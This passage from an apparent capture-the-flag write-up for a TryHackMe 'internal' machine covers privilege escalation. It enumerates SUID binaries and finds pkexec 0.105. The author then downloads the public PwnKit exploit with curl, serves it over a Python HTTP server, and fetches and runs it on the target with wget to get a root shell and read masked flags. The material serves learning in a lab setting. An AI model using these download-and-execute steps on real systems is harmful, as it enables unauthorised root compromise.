# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

# Well, also no crontab
```

```shell
www-data@internal:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Jan 27  2020 /snap/core/9665/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/9665/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/9665/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Mar 25  2019 /snap/core/9665/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Jan 27  2020 /snap/core/9665/bin/umount
     2605     71 -rwsr-xr-x   1 root     root        71824 Mar 25  2019 /snap/core/9665/usr/bin/chfn
     2607     40 -rwsr-xr-x   1 root     root        40432 Mar 25  2019 /snap/core/9665/usr/bin/chsh
     2683     74 -rwsr-xr-x   1 root     root        75304 Mar 25  2019 /snap/core/9665/usr/bin/gpasswd
     2775     39 -rwsr-xr-x   1 root     root        39904 Mar 25  2019 /snap/core/9665/usr/bin/newgrp
     2788     53 -rwsr-xr-x   1 root     root        54256 Mar 25  2019 /snap/core/9665/usr/bin/passwd
     2898    134 -rwsr-xr-x   1 root     root       136808 Jan 31  2020 /snap/core/9665/usr/bin/sudo
     2997     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 11  2020 /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3367    419 -rwsr-xr-x   1 root     root              428240 May 26  2020 /snap/core/9665/usr/lib/openssh/ssh-keysign
     6405    109 -rwsr-xr-x   1 root     root              110656 Jul 10  2020 /snap/core/9665/usr/lib/snapd/snap-confine
     7582    386 -rwsr-xr--   1 root     dip               394984 Feb 11  2020 /snap/core/9665/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 Oct 10  2019 /snap/core/8268/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/8268/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/8268/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/8268/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 Oct 10  2019 /snap/core/8268/bin/umount
     2665     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/8268/usr/bin/chfn
     2667     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/8268/usr/bin/chsh
     2743     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/8268/usr/bin/gpasswd
     2835     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/8268/usr/bin/newgrp
     2848     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/8268/usr/bin/passwd
     2958    134 -rwsr-xr-x   1 root     root              136808 Oct 11  2019 /snap/core/8268/usr/bin/sudo
     3057     42 -rwsr-xr--   1 root     systemd-resolve    42992 Jun 10  2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3427    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
     6462    105 -rwsr-sr-x   1 root     root              106696 Dec  6  2019 /snap/core/8268/usr/lib/snapd/snap-confine
     7636    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/8268/usr/sbin/pppd
   262330     44 -rwsr-xr-x   1 root     root               43088 Mar  5  2020 /bin/mount
   262361     28 -rwsr-xr-x   1 root     root               26696 Mar  5  2020 /bin/umount
   262265     64 -rwsr-xr-x   1 root     root               64424 Jun 28  2019 /bin/ping
   262214     32 -rwsr-xr-x   1 root     root               30800 Aug 11  2016 /bin/fusermount
   262281     44 -rwsr-xr-x   1 root     root               44664 Mar 22  2019 /bin/su
      880     20 -rwsr-xr-x   1 root     root               18448 Jun 28  2019 /usr/bin/traceroute6.iputils
      592     76 -rwsr-xr-x   1 root     root               75824 Mar 22  2019 /usr/bin/gpasswd
      702     40 -rwsr-xr-x   1 root     root               40344 Mar 22  2019 /usr/bin/newgrp
      703     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newuidmap
      497     76 -rwsr-xr-x   1 root     root               76496 Mar 22  2019 /usr/bin/chfn
      701     40 -rwsr-xr-x   1 root     root               37136 Mar 22  2019 /usr/bin/newgidmap
      719     60 -rwsr-xr-x   1 root     root               59640 Mar 22  2019 /usr/bin/passwd
      499     44 -rwsr-xr-x   1 root     root               44528 Mar 22  2019 /usr/bin/chsh
      446     52 -rwsr-sr-x   1 daemon   daemon             51464 Feb 20  2018 /usr/bin/at
      844    148 -rwsr-xr-x   1 root     root              149080 Jan 31  2020 /usr/bin/sudo
      739     24 -rwsr-xr-x   1 root     root               22520 Mar 27  2019 /usr/bin/pkexec
     1072     12 -rwsr-xr-x   1 root     root               10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
     7392    100 -rwsr-xr-x   1 root     root              100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
     1258     16 -rwsr-xr-x   1 root     root               14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     6867    112 -rwsr-xr-x   1 root     root              113528 Jul 10  2020 /usr/lib/snapd/snap-confine
     1254    428 -rwsr-xr-x   1 root     root              436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
     7214     44 -rwsr-xr--   1 root     messagebus         42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@internal:/$ pkexec --version
pkexec --version
pkexec version 0.105
```

pkexec? again? Like 3 rooms already.

Anyway, let's upload PwnKit to finish this and get root on this machine:

```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ curl -fsSL https://raw.githu busercontent.com/ ly4k/P wnKit/ main/PwnKit -o PwnKit # I have ESET Smart Security hunting CVEs on my machine, so I had to leave spaces in the URL.
┌──(kali㉿kali)-[~/Downloads]
└─$ chmod +x PwnKit
                                                                             
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```shell
www-data@internal:/$ cd /tmp
cd /tmp
www-data@internal:/tmp$ wget http://[YOUR IP]:80/PwnKit
wget http://[YOUR IP]:80/PwnKit
--2025-06-02 18:33:35--  http://[YOUR IP]/PwnKit
Connecting to [YOUR IP]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: 'PwnKit'

PwnKit              100%[===================>]  17.62K  74.0KB/s    in 0.2s    

2025-06-02 18:33:36 (74.0 KB/s) - 'PwnKit' saved [18040/18040]

www-data@internal:/tmp$ chmod +x PwnKit
chmod +x PwnKit
www-data@internal:/tmp$ ./PwnKit
./PwnKit
root@internal:/tmp# cd /root 
cd /root
root@internal:~# ls
ls
root.txt  snap
root@internal:~# cat root.txt
cat root.txt
THM{d0XXXXXXXXXXXXXXX #hidden
root@internal:~# cd /
cd /
root@internal:/# ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old
root@internal:/# cd /home 
cd /home
root@internal:/home# ls
ls
aubreanna
root@internal:/home# cd aubreanna
cd aubreanna
root@internal:/home/aubreanna# ls
ls
jenkins.txt  snap  user.txt
root@internal:/home/aubreanna# cat user.txt
cat user.txt
THM{int3XXXXXXXXXXXXX #hidden
root@internal:/home/aubreanna# 
```
